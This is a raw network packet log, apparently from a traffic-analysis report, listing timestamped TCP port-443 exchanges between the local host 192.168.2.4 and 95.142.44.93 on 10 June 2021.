                                                                                                                                    Jun 10, 2021 20:30:51.227310896 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227313995 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227354050 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227360010 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227406979 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227410078 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227452993 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227457047 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227495909 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227509022 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227534056 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227544069 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227572918 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227591991 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227624893 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227650881 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227665901 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227665901 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227705002 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227709055 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227742910 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227745056 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227785110 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227792025 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227828979 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227838993 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227874041 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.227907896 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227953911 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.227993965 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228020906 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228034973 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228041887 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228074074 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228116989 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228121996 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228132010 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228158951 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228158951 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228216887 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228219032 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228252888 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228280067 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228296995 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228308916 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228348017 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228374004 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228387117 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228388071 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228429079 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228430033 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228477955 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228482962 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228519917 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228529930 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228574038 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228578091 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228615999 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228651047 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228663921 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228692055 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228705883 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228705883 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228746891 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228777885 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228796005 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228821039 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228867054 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228873014 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228907108 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228915930 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228946924 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228952885 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.228986025 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.228993893 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.229026079 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.229032993 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.229063034 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.229074001 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.229104996 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.229115009 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.229149103 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.229160070 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.229190111 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.229196072 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.229231119 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.229242086 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.229273081 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.229281902 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.229312897 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.229338884 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.229363918 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308146000 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308191061 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308235884 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308238983 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308270931 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308278084 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308278084 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308317900 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308321953 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308357000 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308361053 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308396101 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308403015 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308444977 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308444977 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308490992 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308501959 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308543921 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308562040 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308571100 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308593988 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308607101 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308624029 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308626890 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308655977 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308677912 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308677912 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308717012 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308734894 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308758020 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308760881 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308799028 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308800936 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308845043 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308854103 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308902025 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308911085 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308933020 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308964014 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.308980942 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.308996916 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309011936 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309032917 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309045076 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309073925 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309084892 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309118032 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309140921 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309165001 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309179068 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309217930 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309230089 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309237957 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309266090 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309269905 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309328079 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309329033 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309387922 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309389114 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309433937 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309442043 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309475899 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309485912 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309525013 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309530020 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309565067 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309566021 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309607983 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309608936 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309645891 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309655905 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309686899 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309695959 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309725046 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309726954 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309771061 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309776068 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309819937 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309854031 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309859037 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309869051 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309897900 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309911013 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309937954 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309943914 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.309978008 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.309986115 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310018063 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310033083 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310058117 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310062885 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310100079 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310106039 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310149908 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310151100 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310189962 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310194016 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310230017 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310233116 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310271025 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310275078 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310308933 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310314894 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310350895 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310353041 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310391903 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310405016 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310441971 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310444117 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310487032 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310520887 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310527086 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310542107 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310568094 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310571909 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310607910 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310627937 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310647964 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310682058 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310688972 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310724974 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310729027 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310743093 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310769081 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310777903 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310822010 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310822964 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310861111 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310889006 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310900927 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310915947 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310940981 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310942888 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.310981035 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.310997009 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311022997 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311054945 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311063051 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311078072 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311108112 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311113119 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311199903 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311216116 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311242104 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311271906 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311283112 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311288118 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311333895 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311333895 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311379910 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311381102 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311419010 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311431885 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311460018 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311460972 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311501980 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311502934 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311542034 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311547041 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311582088 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311602116 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311621904 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311623096 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311666012 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311670065 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311717033 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311717033 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311754942 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311769962 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311795950 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311830997 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311837912 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.311840057 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311883926 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.311959982 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312007904 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312009096 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312053919 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312055111 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312092066 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312096119 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312131882 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312134981 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312172890 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312179089 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312216043 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312247992 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312256098 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312271118 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312295914 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312310934 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312345028 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312345982 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312390089 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312391043 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312428951 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312433004 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312468052 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312468052 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312508106 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312508106 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312546015 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312551022 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312587023 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312589884 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312625885 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312628984 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312668085 CEST49734443192.168.2.495.142.44.93
                                                                                                                                    Jun 10, 2021 20:30:51.312675953 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312721014 CEST4434973495.142.44.93192.168.2.4
                                                                                                                                    Jun 10, 2021 20:30:51.312728882 CEST49734443192.168.2.495.142.44.93
